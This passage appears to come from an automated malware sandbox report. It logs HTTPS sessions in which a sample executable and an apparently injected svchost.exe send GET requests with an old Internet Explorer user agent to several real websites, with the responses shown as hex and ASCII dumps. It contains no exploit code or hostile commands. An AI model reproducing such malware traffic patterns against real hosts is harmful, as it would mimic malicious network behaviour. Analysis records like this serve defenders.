                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:34 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 75193
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  ETag: "61e91823-125b9"
                                                                                                                                                                                                                                                  Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                  X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                  2023-07-27 19:53:34 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                  2023-07-27 19:53:34 UTC16INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                  Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
                                                                                                                                                                                                                                                  2023-07-27 19:53:34 UTC32INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                  Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                  2023-07-27 19:53:34 UTC48INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                  Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
                                                                                                                                                                                                                                                  2023-07-27 19:53:34 UTC64INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
                                                                                                                                                                                                                                                  Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  1192.168.2.450138188.114.96.7443C:\Users\user\Desktop\CX17SY6xF6.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:34 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: hyab.se
                                                                                                                                                                                                                                                  2023-07-27 19:53:35 UTC74INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:34 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Location: https://hyab.com
                                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                                  Expires: Thu, 27 Jul 2023 20:03:34 GMT
                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4LRjXs6HURS%2B36bSIP0wEc%2FU3FTkykxYJWPU%2BKvsXkZCbuhgbcyV2Mj0COdHHj6VojKwhXScx2o0ySetdppVt0Xt%2FMOBYt4PN%2BmT%2FvFZjG0pyhpAT4FyES6U"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 7ed76de93f251959-FRA
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2023-07-27 19:53:35 UTC74INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                  2023-07-27 19:53:35 UTC74INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  10192.168.2.450212185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC80OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: techtrans.de
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC81INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:36 GMT
                                                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                  Expires: 0
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                                                                                  Connection: Upgrade, close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC81INData Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                  Data Ascii: 2c3<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  11192.168.2.45021591.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC180OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC180INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:55:27 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC180INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                  Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC196INData Raw: 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 0d 0a 32 30 30 30 0d 0a 65 6e 74 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20
                                                                                                                                                                                                                                                  Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... cont2000ent --><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ...
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC212INData Raw: 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 38 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2c 64 6f 70 61 6c 61 63 0d 0a 31 30 30 30 0d 0a 7a 65 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 64 6f 70 61 6c 61 63 7a 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61
                                                                                                                                                                                                                                                  Data Ascii: aria-hidden="true" /></a></div><div class="item" style="width:300px; height:85px;margin-bottom:10px"><a href="/w20/batony/3961,dopalac1000ze.html" target="_blank" aria-label="dopalacze"><img src="/dokumenty/batony/3961.jpg?v=1657112618" a
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC228INData Raw: 63 6a 61 50 4c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 59 6f 75 54 75 62 65 22 20 63 6c 61 73 73 3d 22 79 74 22 3e 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 59 6f 75 54 75 62 65 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 57 69 65 6c 6b 6f 70 6f 6c 73 6b 61 2d 50 6f 0d 0a 37 34 32 0d 0a 6c 69 63 6a 61 2d 34 39 30 31 39 36 36 30 34 34 37 30 33 34 32 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 46 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73
                                                                                                                                                                                                                                                  Data Ascii: cjaPL" target="_blank" title="Odwied nas na YouTube" class="yt">Odwied nas na YouTube</a></li> <li><a href="https://www.facebook.com/Wielkopolska-Po742licja-490196604470342/" target="_blank" title="Odwied nas na Facebook" clas


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  12192.168.2.4526165.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:50 UTC1366OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                  2023-07-27 19:53:50 UTC1366INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:50 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                  Last-Modified: Fri, 30 Jun 2023 05:41:10 GMT
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 53069
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  2023-07-27 19:53:50 UTC1366INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                  2023-07-27 19:53:50 UTC1382INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                  Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                                                                                                  2023-07-27 19:53:50 UTC1398INData Raw: 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 6c 61 6e 64 73 63 61 70 65 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65
                                                                                                                                                                                                                                                  Data Ascii: r.jpg"><source media="(max-width: 767px) and (orientation:landscape)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/file
                                                                                                                                                                                                                                                  2023-07-27 19:53:50 UTC1414INData Raw: 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64
                                                                                                                                                                                                                                                  Data Ascii: srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  13192.168.2.45732594.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:54 UTC1418OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
